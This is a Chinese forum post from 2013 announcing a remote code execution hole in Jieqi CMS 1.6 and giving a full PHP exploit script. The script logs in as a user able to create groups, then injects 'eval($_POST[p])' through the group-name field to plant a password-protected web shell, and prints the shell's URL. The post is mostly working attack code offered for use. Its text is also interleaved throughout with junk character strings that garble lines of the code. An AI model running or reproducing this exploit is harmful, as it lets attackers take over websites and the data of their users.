杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
f" f1 U. c! S' z% _+ O- Q, [3 {9 s+ n
, Q, X! n1 ~" E7 R! l9 N, U7 c! f% g
该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。+ @3 h4 G" V7 x, o0 c; z
需要有一个能创建圈子的用户。: i' X, H+ G2 x* Z' G5 t
9 ^# {! \) U0 |; F+ S<?php; m% M8 n- `! Y5 W' E8 B* S
+ }' l% C" v7 N! Yprint_r('$ P3 a0 @6 _, K( \
+---------------------------------------------------------------------------+7 k5 f0 R- E: F9 |) m1 E
Jieqi CMS V1.6 PHP Code Injection Exploit
9 F6 I, W X4 V6 rby flyh4t
. f& z4 r3 m8 b0 D) n* h4 d/ y! ~1 Gmail: phpsec at hotmail dot com
+ b: h" g- m0 a u7 ~! Q' \* fteam: http://www.wolvez.org
% v! G7 L1 i9 Q+---------------------------------------------------------------------------+( K8 F9 d0 O- ^& v, H8 e6 I
'); /**
9 O3 g1 u$ @, s# \# r2 o3 _3 y* X * works regardless of php.ini settings
" o- R% n6 J: W4 ]*/ if ($argc < 5) { print_r('8 H% x6 p" x* f( M: e
+---------------------------------------------------------------------------+& y C$ F3 ]: ?) Z
Usage: php '.$argv[0].' host path username
( q* @; K( e1 `' w9 Thost: target server (ip/hostname). V/ O) E5 X6 {& e* T4 y% B
path: path to jieqicms 0 J' }9 ~3 m# P' c
uasename: a username who can create group
, S! Q! s% I4 ]7 d. n- `" j4 P' GExample:
' y1 V0 @5 e, lphp '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password9 S' H& Y6 J2 n% \0 N
+---------------------------------------------------------------------------+
" `# o1 @8 a; e/ N'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
; W/ G# k$ T1 N; u: I* ?Content-Disposition: form-data; name="gname"
1 ]: l) E$ M( B6 Z9 G" S7 v% V + R4 W! z! Q8 Z$ f& ~3 u' O8 u
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t
% g+ b! i5 J6 }. `-----------------------------23281168279961
2 l! |+ y' d5 j, M7 `/ ~' o8 aContent-Disposition: form-data; name="gcatid"
8 ~ i+ b" c7 I9 |, l- b1 ^5 N
* @4 @* U2 S; D0 w2 Q! Q8 D1
3 X) w! O- M, I6 d/ j7 M& k-----------------------------23281168279961
, d8 W$ W' X( W4 O+ kContent-Disposition: form-data; name="gaudit"
* f# x" z% f! K
( e, l* j/ ^7 E1, L( @& G+ d- o! {/ X
-----------------------------232811682799615 V0 U7 d6 L$ E9 g9 C# f( {6 E
Content-Disposition: form-data; name="gbrief"+ x* [5 a! S1 w4 O+ R! y. X/ i
6 m7 Y8 D: E7 r3 x4 q
13 ~( T5 Z5 J1 _4 e
-----------------------------23281168279961--
, s" \) M4 i2 V+ i'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com
: b* j% \! [6 D7 Y. o/ B
& ?! n( H, F3 z8 opreg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |
发表于 2013-2-23 11:28:09
收藏
支持
反对